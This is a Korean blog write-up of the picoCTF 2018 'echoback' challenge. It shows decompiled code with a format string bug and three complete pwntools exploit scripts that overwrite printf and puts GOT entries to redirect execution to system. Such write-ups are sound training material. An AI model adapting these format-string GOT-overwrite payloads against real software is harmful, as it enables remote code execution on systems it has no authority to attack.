| // pseudo-code | |
| int vuln() | |
| { | |
| char buf; // [sp+Ch] [bp-8Ch]@1 | |
| int v2; // [sp+8Ch] [bp-Ch]@1 | |
| v2 = *MK_FP(__GS__, 20); | |
| memset(&buf, 0, 0x80u); | |
| system("echo input your message:"); | |
| read(0, &buf, 0x7Fu); | |
| printf(&buf); | |
| puts("\n"); | |
| puts("Thanks for sending the message!"); | |
| return *MK_FP(__GS__, 20) ^ v2; | |
| } | |
| int __cdecl main(int argc, const char **argv, const char **envp) | |
| { | |
| __gid_t v3; // ST18_4@1 | |
| setvbuf(_bss_start, 0, 2, 0); | |
| v3 = getegid(); | |
| setresgid(v3, v3, v3); | |
| vuln(); | |
| return 0; | |
| } |
point
1. FSB(Format String Bug)
2. GOT overwrite
* FSB 자세한 정리 : https://pu1et-panggg.tistory.com/22
어디부터 쓸 수 있는지 확인
총 크게 두 가지 방법이 있다.
1. got주소 알아내서 FSP로 got overwrite
printf@got <- system@plt
puts@got <- vuln주소(0x80485ab)
gdb elfsymbol + readelf -s echoback
printf@got : 0x804a010
puts@got : 0x804a01c
system@plt : 0x8048460
vuln : 0x80485ab
1-1. 주소의 하위 2byte 후 상위 2byte overwrite
ex) 0x804a010일 경우, 0xa010 후 0x804 overwrite
| from pwn import * | |
| p=remote('2018shell1.picoctf.com',37857) | |
| print p.recvuntil('input your message:') | |
| payload = p32(0x804a01c) + p32(0x804a01c+2) | |
| payload += '%'+ str((0x80485ab & 0xffff) - 8) +'x' | |
| payload += '%7$hn' | |
| payload += '%'+ str(0x10000+ ((0x80485ab >> 16) - 0x80485ab & 0xffff)) +'x' | |
| payload += '%8$hn' | |
| p.sendline(payload) | |
| print p.recvuntil('input your message:') | |
| payload = '' | |
| payload += p32(0x804a010) + p32(0x804a010+2) | |
| payload += '%'+ str((0x8048460 & 0xffff) - 8) +'x' | |
| payload += '%7$hn' | |
| payload += '%'+ str(0x10000+ ((0x8048460 >> 16) - 0x8048460 & 0xffff)) +'x' | |
| payload += '%8$hn' | |
| p.sendline(payload) | |
| p.interactive() |
1-2. 주소의 상위 2byte 후 하위 2byte overwrite
ex) 0x804a010일 경우, 0x804 후 0xa010 overwrite
| from pwn import * | |
| p=remote('2018shell1.picoctf.com',37857) | |
| p.recvuntil('input your message:') | |
| payload = p32(0x804a01c+2) + p32(0x804a01c) | |
| payload += '%'+str((0x80485ab >> 16) - 8)+'x' | |
| payload += '%7$hn' | |
| payload += '%'+ str((0x80485ab & 0xffff) - (0x80485ab >> 16)) +'x' | |
| payload += '%8$hn' | |
| p.sendline(payload) | |
| print p.recvuntil('input your message:') | |
| payload = '' | |
| payload += p32(0x804a010+2) + p32(0x804a010) | |
| payload += '%'+str((0x8048460 >> 16) - 8)+'x' | |
| payload += '%7$hn' | |
| payload += '%'+ str((0x8048460 & 0xffff) - (0x8048460 >> 16)) +'x' | |
| payload += '%8$hn' | |
| p.sendline(payload) | |
| p.interactive() |
2. ELF사용해서 FSP로 got overwrite
binary = ELF('./echoback')
plt 주소는 binary.symbols['plt.system']
got 주소는 binary.symbols['got.puts']
| from pwn import * | |
| binary = ELF('./echoback') | |
| puts_got = binary.symbols['got.puts'] | |
| printf_got = binary.symbols['got.printf'] | |
| system_plt = binary.symbols['plt.system'] | |
| vuln = binary.symbols['vuln'] | |
| p=remote('2018shell1.picoctf.com',37857) | |
| print p.recvuntil('input your message:') | |
| payload = p32(puts_got) + p32(puts_got+2) | |
| payload += '%'+ str((vuln & 0xffff) - 8) +'x' | |
| payload += '%7$hn' | |
| payload += '%'+ str(0x10000+ ((vuln >> 16) - vuln & 0xffff)) +'x' | |
| payload += '%8$hn' | |
| p.sendline(payload) | |
| print p.recvuntil('input your message:') | |
| payload = '' | |
| payload += p32(printf_got) + p32(printf_got+2) | |
| payload += '%'+ str((system_plt & 0xffff) - 8) +'x' | |
| payload += '%7$hn' | |
| payload += '%'+ str(0x10000+ ((system_plt >> 16) - system_plt & 0xffff)) +'x' | |
| payload += '%8$hn' | |
| p.sendline(payload) | |
| p.interactive() |
'CTF > picoCTF' 카테고리의 다른 글
| rop chain (0) | 2019.01.11 |
|---|---|
| buffer overflow 3 (0) | 2018.12.29 |
| authenticate (0) | 2018.12.28 |
| keygen-me1 (0) | 2018.11.18 |
| assembly4 (0) | 2018.11.18 |
